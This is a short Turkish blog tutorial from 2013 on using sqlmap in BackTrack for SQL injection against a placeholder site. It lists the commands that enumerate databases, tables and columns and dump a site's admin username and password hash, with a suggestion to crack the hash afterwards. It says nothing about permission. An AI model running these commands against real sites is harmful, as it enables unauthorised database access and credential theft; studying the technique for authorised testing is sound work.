Guvenlik, Pentesting

Back Track ile SQL Injection

11 Eylül 2013

Yazıma başlamadan önce belirtmek isterim ki bu anlatımları videolu olarak çekersem çok daha güzel olacağının farkındayım. Ancak bir takım teknik sebeplerden dolayı video çekemiyorum. Bu sebeple elimden geldiğince iyi anlatmaya çalışıyorum. Dikkatli okursanız yapılamayacak şeyler değil 🙂

 

İlk olarak sqlmap uygulamamızı açıyoruz. Bu uygulamaya Back Track’in menüsünde Exploitation Tools > Database Exploitation Tools > MSSQL / MySQL / Oracle Exploitation Tools altında bulabilirsiniz.

 

Açılan terminale aşağıdaki komutu giriyoruz.

[highlight]python sqlmap.py -u http://hedefsite.com/index.php?id=xxx –dbs[/highlight]

Bu komut sayesinde hedef sitemizdeki veritabanları listelenecek.

Şimdi karşımıza gelen veritabanı bilgilerini görelim. Bunun için;

[highlight]python sqlmap.py -D veritabanıadı –tables[/highlight]  yazıyoruz.

Şimdi Columns’ları görmemiz lazım. Havij ile SQL İnjection yapan yada manuel olarak yapan arkadaşlar bu aşamaları zaten biliyordur. Bunun için de şu komutu giriyoruz;

[highlight]python sqlmap.py http://hedefsite.com -D veritabanıadı -T tableadı –columns[/highlight]

Ve column’lar elimizde.

Sqlmap Id Pw

 

Şimdi sıra bu Column’lardan ID ve PW’yi bulmaya geldi. Komutumuz;

[highlight]python sqlmap.py -u http://hedefsite.com -D veritabanıadı -T tableadı -C pwd –dump[/highlight]

Karşımıza çıkan soruya [highlight]Y[/highlight] cevabını verelim. Eğer shutting down derse aynı kodu tekrar giriyoruz. Mutlaka çıkacaktır şifremiz. Tabiki öyle kabak gibi elimize vermeyecektir şifreyi 🙂 Hashlenmiş halini verecektir. Şimdi sıra geldi ID’mizi bulmaya. Kodumuz;

[highlight]python sqlmap.py -u http://hedefsite.com -D veritabanıadı -T tableadı -C uname –dump[/highlight]

Sqlmap Uname

 

Ve ID’miz karşımızda. ID’miz admin. Şifremizin hashli halini zaten öğrenmiştik. Bunun da hashini kırdığımızda şifremizde elimizde olacak. Bu kadar.

You Might Also Like

Henüz Yorum Yok

Bir Yorum Bırak

seventeen − 14 =